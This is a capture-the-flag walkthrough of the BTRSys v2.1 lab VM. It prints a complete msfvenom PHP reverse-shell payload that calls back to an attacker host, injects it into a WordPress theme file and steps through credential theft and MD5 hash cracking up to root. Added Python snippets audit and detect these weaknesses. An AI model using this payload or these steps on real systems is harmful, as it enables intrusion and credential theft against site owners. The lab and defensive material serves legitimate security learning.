Amonsec


BTRSys v2: CTF walkthrough

Introduction

Name: BTRSys: v2.1
Release date: 31 Jul 2017

Author: ismailonderkaya
Series: BTRSys
VM link: https://www.vulnhub.com/entry/btrsys-v21,196/


Reconnaissance

As usual, we use arp-scan to retrieve the IP address of the target system on the same local network.

btrsys_v2_ctf_walkthrough_arp_scan.png

Then, we use nmap to scan open ports, in order to find which services are publicly accessible.

root@kali:~/Desktop# nmap 192.168.1.48

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-16 22:15 CEST
Nmap scan report for yoda.home (192.168.1.48)
Host is up (0.033s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)

Nmap done: 1 IP address (1 host up) scanned in 123.28 seconds
root@kali:~/Desktop#

As in the first VM, the FTP service is of no use. Only ports 80 and 22 will be used.


WordPress admin panel

On the home page there is a weird GIF that links to another GIF. Reading the robots.txt file reveals the real website.

root@kali:~/Desktop# curl http://192.168.1.48/robots.txt
Disallow: Hackers
Allow: /wordpress/


 .o+.                    :o/                                                   -o+`                
  /hh:                    shh`                                                  +hh-                
  /hh:                    shh`                         -/:                      +hh-                
  /hh:                    shh`                         +s+                      +hh-                
  /hh/............   `....shh-....   ...............`  `-`   `..............`   +hh-          ..    
  /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/  oys   +ssssssssssssss/   +hh-        .+yy-   
  /hh+---------/hh+  .----yhh:----  :hho------------`  yhy`  oyy------------`   +hh-      .+yys:`   
  /hh:         -hh+       shh`      :hh+               yhy`  oyy                +hh-   `.+yys/`     
  /hh:         -hh+       shh`      :hh+               yhy`  oss          `--   +hhsssssyhy/`       
  /hh:         -hh+       shh`      :hh+               yhy`  `-.          +yy.  +hho+++osyy+.       
  /hh:         -hh+       shh`      :hh+               yhy`               +yy.  +hh-    `/syy+.     
  /hho:::::::::+hh+       shh`      :hh+               yhy`  .::::::::::::oyy.  +hh-      `/yyy/`   
  :yyyyyyyyyyyyyyy:       +ys`      .yy:               oys   +sssssssssssssss`  /ys.        `/sy-   
   ```````````````         `         ``                 `     ``````````````     ``                
root@kali:~/Desktop#
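The lesson of the robots.txt step is that the file is a public hint list, not an access control: every path it names is readable by anyone who fetches it. The following parser is an added example (not code from the original post); it takes a constructed robots.txt modelled on the one above, skips comments and non-directive lines such as the ASCII banner, and lists the paths the file discloses. Values that are not paths, like "Disallow: Hackers", are ignored.

```python
import re
from typing import List, Tuple

# Constructed sample: the two directive lines the walkthrough retrieved,
# plus a comment and an extra rule, so the parser has something to skip
# and to de-duplicate. The ASCII-art banner is left out: it is not a directive.
SAMPLE_ROBOTS = """\
# constructed sample, modelled on the walkthrough's robots.txt
User-agent: *
Disallow: Hackers
Allow: /wordpress/
Disallow: /wp-admin/   # trailing comment
Allow: /wordpress/
"""

# A directive is "Name: value"; names are letters and hyphens only, so the
# banner's "/hh:" style lines never match.
DIRECTIVE_RE = re.compile(r"^\s*([A-Za-z-]+)\s*:\s*(.*?)\s*$")


def parse_robots(text: str) -> List[Tuple[str, str]]:
    """Return (directive, value) pairs; comments and non-directive lines are dropped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0]          # strip comments
        match = DIRECTIVE_RE.match(line)
        if match:
            rules.append((match.group(1).lower(), match.group(2)))
    return rules


def disclosed_paths(text: str) -> List[str]:
    """URL paths named by Allow/Disallow, in file order, without duplicates.

    A value that does not start with '/' (the walkthrough's 'Disallow: Hackers')
    is not a path and is ignored.
    """
    paths: List[str] = []
    for directive, value in parse_robots(text):
        if directive in ("allow", "disallow") and value.startswith("/") and value not in paths:
            paths.append(value)
    return paths


if __name__ == "__main__":
    for path in disclosed_paths(SAMPLE_ROBOTS):
        print("robots.txt discloses:", path)
```

Run on the real file, the script prints /wordpress/ even though nothing on the home page links to it, which is exactly why hidden paths should be protected by authentication or left out of robots.txt altogether rather than hidden by omission.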

The first thing I did was try to log into the WordPress admin panel, and surprisingly the good old admin:admin works.


From WordPress to reverse shell

Thanks again to TAPE for this awesome tutorial. You can find the tutorial here and TAPE's website here.

We can't upload files or themes. Instead of creating a theme, we will modify the header.php file of the currently active theme.
First, we generate a PHP payload.

root@kali:~/Desktop# msfvenom -p php/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.102 -f raw 
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 964 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.1.102'; $port = 1337; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();
root@kali:~/Desktop#

We configure our Metasploit handler.

root@kali:~/Desktop# /etc/init.d/postgresql start 
[ ok ] Starting postgresql (via systemctl): postgresql.service.
root@kali:~/Desktop# msfconsole -q
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.102
LHOST => 192.168.1.102
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > run 
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.102:1337 
msf exploit(handler) >

We change the content of the header.php file.

btrsys_v2_ctf_walkthrough_header_to_reverse_shell.png

Finally, we have a low-privilege reverse shell.

btrsys_v2_ctf_walkthrough_low_reverse_shell.png
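From the defender's side, the theme-editor step above leaves two traces: header.php no longer matches the copy the theme shipped with, and it now combines a socket call with eval() of whatever comes back from that socket, the same building blocks the msfvenom output shows. The scanner below is an added example (not WordPress, Metasploit or the post's own code) that sweeps a theme directory for both signs. It runs on constructed fixtures: a stand-in clean header.php and a non-working skeleton of the payload with a placeholder host; the hash list of known-good files is something you would generate from a pristine copy of the theme.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, List

# Names used by the page's msfvenom payload to reach the handler, plus eval,
# which executes whatever is read back from that socket.
SOCKET_FUNCS = ("stream_socket_client", "fsockopen", "socket_create", "socket_connect")
SUSPECT_PATTERNS = {
    "socket": re.compile(r"\b(?:" + "|".join(SOCKET_FUNCS) + r")\s*\(", re.IGNORECASE),
    "eval": re.compile(r"\beval\s*\(", re.IGNORECASE),
    "silenced_errors": re.compile(r"\berror_reporting\s*\(\s*0\s*\)", re.IGNORECASE),
}

# Constructed stand-in for a clean theme header (not a real theme's code).
CLEAN_HEADER = """<?php
/** constructed sample header.php */
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head><?php wp_head(); ?></head>
<body <?php body_class(); ?>>
"""

# Constructed fixture: the clean header with a non-working skeleton of the
# walkthrough's payload prepended (same shape: error_reporting(0), a socket
# call, eval of received data) but a placeholder host and no real logic.
INJECTED_HEADER = (
    "/*<?php /**/ error_reporting(0); $s = stream_socket_client('tcp://HOST:PORT'); "
    "eval($b); ?>\n" + CLEAN_HEADER
)
CLEAN_FOOTER = "<?php wp_footer(); ?></body></html>\n"


def score_php_source(source: str) -> Dict[str, int]:
    """Number of matches of each suspect pattern in one PHP source."""
    return {name: len(pat.findall(source)) for name, pat in SUSPECT_PATTERNS.items()}


def is_suspicious(scores: Dict[str, int]) -> bool:
    """eval() next to a socket call is the reverse-shell signature; a lone
    fsockopen (say, a plugin's HTTP client) is not enough by itself."""
    return scores["eval"] > 0 and scores["socket"] > 0


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_theme_dir(theme_dir: str, known_good: Dict[str, str]) -> List[dict]:
    """Flag .php files whose hash differs from the known-good copy, or that
    match the signature even when no reference hash exists for them."""
    findings = []
    for root, _dirs, files in os.walk(theme_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            rel = os.path.relpath(path, theme_dir)
            with open(path, "rb") as fh:
                data = fh.read()
            scores = score_php_source(data.decode("utf-8", errors="replace"))
            modified = rel in known_good and known_good[rel] != sha256_bytes(data)
            if modified or is_suspicious(scores):
                findings.append({"file": rel, "modified": modified, "scores": scores})
    return findings


def demo() -> List[dict]:
    """Build a throwaway theme directory from the constructed fixtures and scan it."""
    theme_dir = tempfile.mkdtemp(prefix="theme-")
    with open(os.path.join(theme_dir, "header.php"), "wb") as fh:
        fh.write(INJECTED_HEADER.encode())
    with open(os.path.join(theme_dir, "footer.php"), "wb") as fh:
        fh.write(CLEAN_FOOTER.encode())
    # Reference hashes of the files as the theme shipped them.
    known_good = {
        "header.php": sha256_bytes(CLEAN_HEADER.encode()),
        "footer.php": sha256_bytes(CLEAN_FOOTER.encode()),
    }
    return scan_theme_dir(theme_dir, known_good)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The hash comparison is the reliable check; the pattern scores only help when no reference copy exists. Setting DISALLOW_FILE_EDIT in wp-config.php removes the theme editor this attack relies on, and is the simpler fix.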

Privilege escalation

Once again, config files are a rich source of information.

meterpreter > shell
Process 1300 created.
Channel 0 created.
/bin/bash -i
bash: cannot set terminal process group (859): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress$ cat wp-config.php
cat wp-config.php
<?php
[..snip..]
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');
[..snip..]
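Two things make that wp-config.php dangerous: WordPress connects as the MySQL superuser, so a web-shell as www-data is automatically a database administrator, and the password is a variant of the username. The small auditor below is an added example (not the post's own code) that pulls the define() constants out of a wp-config.php dump and reports both weaknesses; the sample file it checks is a constructed copy of the defines shown above.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample mirroring the defines shown in the walkthrough.
SAMPLE_WP_CONFIG = """\
<?php
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
/** MySQL hostname */
define('DB_HOST', 'localhost');
"""

# define('NAME', 'value') with single-quoted strings; escaped quotes allowed.
DEFINE_RE = re.compile(r"define\(\s*'([A-Za-z0-9_]+)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)")


def extract_defines(php_source: str) -> Dict[str, str]:
    """Return the string constants set with define('NAME', 'value')."""
    return {name: value for name, value in DEFINE_RE.findall(php_source)}


def audit_db_settings(defines: Dict[str, str]) -> List[Tuple[str, str]]:
    """(setting, finding) pairs for the DB_* values; empty when nothing is wrong."""
    findings = []
    user = defines.get("DB_USER", "")
    password = defines.get("DB_PASSWORD", "")
    if user == "root":
        findings.append(("DB_USER", "the database superuser is used; WordPress only needs "
                                    "privileges on its own schema, so create a dedicated account"))
    if len(password) < 12 or (user and user.lower() in password.lower()):
        findings.append(("DB_PASSWORD", "short or derived from the username; "
                                        "use a long random secret"))
    return findings


if __name__ == "__main__":
    for setting, message in audit_db_settings(extract_defines(SAMPLE_WP_CONFIG)):
        print(f"{setting}: {message}")
```

A dedicated account with rights only on the wordpress schema would have limited the next step to that one database instead of the whole server.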

Now we can play with MySQL, especially the wp_users table of the wordpress database.

www-data@ubuntu:/var/www/html/wordpress$ mysql -uroot -p -D wordpress -e 'show tables;'
<ml/wordpress$ mysql -uroot -p -D wordpress -e 'show tables;'                
Enter password: rootpassword!
Tables_in_wordpress
wp_abtest_experiments
wp_abtest_goal_hits
wp_abtest_goals
wp_abtest_ip_filters
wp_abtest_variation_views
wp_abtest_variations
wp_commentmeta
wp_comments
wp_links
wp_masta_campaign
wp_masta_cronapi
wp_masta_list
wp_masta_reports
wp_masta_responder
wp_masta_responder_reports
wp_masta_settings
wp_masta_subscribers
wp_masta_support
wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_terms
wp_usermeta
wp_users
www-data@ubuntu:/var/www/html/wordpress$

Let’s see if we can find passwords in the wp_users table.

www-data@ubuntu:/var/www/html/wordpress$ mysql -uroot -p -D wordpress -e 'select * from wp_users;'
<ml/wordpress$ mysql -uroot -p -D wordpress -e 'select * from wp_users;'     
Enter password: rootpassword!
ID    user_login    user_pass    user_nicename    user_email    user_url    user_registered    user_activation_key    user_status    display_name
1    root    a318e4507e5a74604aafb45e4741edd3    btrisk    mdemir@btrisk.com        2017-04-24 17:37:04        0    btrisk
2    admin    21232f297a57a5a743894a0e4a801fc3    admin    ikaya@btrisk.com        2017-04-24 17:37:04        4    admin
www-data@ubuntu:/var/www/html/wordpress$

Nice, we found MD5 password hashes. We can easily crack them with the hashkiller website, which you can find here.

a318e4507e5a74604aafb45e4741edd3 MD5 : roottoor
21232f297a57a5a743894a0e4a801fc3 MD5 : admin
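What makes the lookup above so easy is the hash format: WordPress normally stores phpass hashes (prefix $P$, salted and iterated), and only rewrites a legacy unsalted MD5 to phpass the next time that user logs in. A bare 32-hex value in user_pass therefore signals a legacy hash that any wordlist defeats. The auditor below is an added example (not the post's code) that classifies each row of a constructed copy of the wp_users dump and tries a tiny constructed wordlist against the legacy ones; it also covers the admin:admin login from the admin-panel step, since "admin" is the word that matches the second hash.

```python
import hashlib
from typing import List, Optional, Tuple

# Constructed copy of the two wp_users rows shown in the walkthrough.
SAMPLE_WP_USERS: List[Tuple[str, str]] = [
    ("root", "a318e4507e5a74604aafb45e4741edd3"),
    ("admin", "21232f297a57a5a743894a0e4a801fc3"),
]

# Constructed mini wordlist; a real audit would use a full dictionary.
WORDLIST = ["password", "123456", "admin", "roottoor", "letmein"]

HEX_DIGITS = set("0123456789abcdef")


def classify_hash(stored: str) -> str:
    """Tell a phpass hash (what WordPress writes) from a legacy unsalted MD5."""
    if stored.startswith(("$P$", "$H$")):
        return "phpass"
    if len(stored) == 32 and set(stored.lower()) <= HEX_DIGITS:
        return "md5-legacy"
    return "unknown"


def lookup_md5(stored: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary lookup: the word whose MD5 equals the stored hash, if any."""
    target = stored.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def audit_users(rows: List[Tuple[str, str]], wordlist: List[str]) -> List[dict]:
    """One report entry per user: hash kind, and the matching word for legacy hashes."""
    report = []
    for login, stored in rows:
        kind = classify_hash(stored)
        entry = {"user": login, "kind": kind, "guessed": None}
        if kind == "md5-legacy":
            entry["guessed"] = lookup_md5(stored, wordlist)
        report.append(entry)
    return report


if __name__ == "__main__":
    for entry in audit_users(SAMPLE_WP_USERS, WORDLIST):
        print(entry)
```

On a site you administer, any md5-legacy entry is a user who has not logged in since the hash was imported; forcing a password reset for those accounts both upgrades the hash and replaces the weak password.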

We have the password of the root user; let's try it.

Note: since we don't have a real TTY shell, we can't use the su command, but SSH can be used.

btrsys_v2_ctf_walkthrough_root_shell.png